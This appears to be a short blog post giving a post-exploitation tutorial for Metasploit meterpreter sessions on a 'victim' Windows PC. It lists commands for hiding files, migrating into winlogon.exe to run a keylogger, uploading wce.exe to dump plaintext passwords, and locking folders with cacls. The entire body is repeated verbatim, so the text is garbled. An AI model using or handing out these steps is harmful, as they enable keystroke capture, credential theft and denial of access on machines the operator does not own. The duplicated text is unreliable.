(A)Hide File in victim `s P.C:-
After successfully got meterpreter sessions you can hide any file in victim `s P.C. Type following attribute.
attrib +h +r +s drivename:/Foldername
For example you want to hide folder name “songs” in F drive then just type following command in your terminal.
shell
attrib +h +r +s F:/songs
For unhidden file attrib -h -r -s F:/songs
(B)Get passwords of remote windows P.C:-
After getting meterpreter session type ps command it will display list of running process. Now we should migrate meterpreter session to any running process with their process i.d.
In this example we will migrate meterpreter session to winlogon.exe which process i.d. Is 600.
Type following command in your terminal.
migrate 600
Keyscan_start – to start the keylogger
Keyscan_dump – to print captured keystrokes
Keyscan_stop – to stop the keylogger
(C)Remote Windows password in plain text :-
Type following command in your meterpreter session.
Upload /pentest/passwords/wce/wce.exe
shell
wce.exe -w
(D)Lock Folder in Remote P.C. :-
After getting meterpreter session type following command.
Cacls (Folder Name) /e /p everyone:n
This will lock your folder.
For unlock
Cacls (Folder Name) /e /p everyone:f
Here is more method of post exploitation.
After successfully got meterpreter sessions you can hide any file in victim `s P.C. Type following attribute.
attrib +h +r +s drivename:/Foldername
For example you want to hide folder name “songs” in F drive then just type following command in your terminal.
shell
attrib +h +r +s F:/songs
For unhidden file attrib -h -r -s F:/songs
(B)Get passwords of remote windows P.C:-
After getting meterpreter session type ps command it will display list of running process. Now we should migrate meterpreter session to any running process with their process i.d.
In this example we will migrate meterpreter session to winlogon.exe which process i.d. Is 600.
Type following command in your terminal.
migrate 600
Keyscan_start – to start the keylogger
Keyscan_dump – to print captured keystrokes
Keyscan_stop – to stop the keylogger
(C)Remote Windows password in plain text :-
Type following command in your meterpreter session.
Upload /pentest/passwords/wce/wce.exe
shell
wce.exe -w
(D)Lock Folder in Remote P.C. :-
After getting meterpreter session type following command.
Cacls (Folder Name) /e /p everyone:n
This will lock your folder.
For unlock
Cacls (Folder Name) /e /p everyone:f
Here is more method of post exploitation.
No comments:
Post a Comment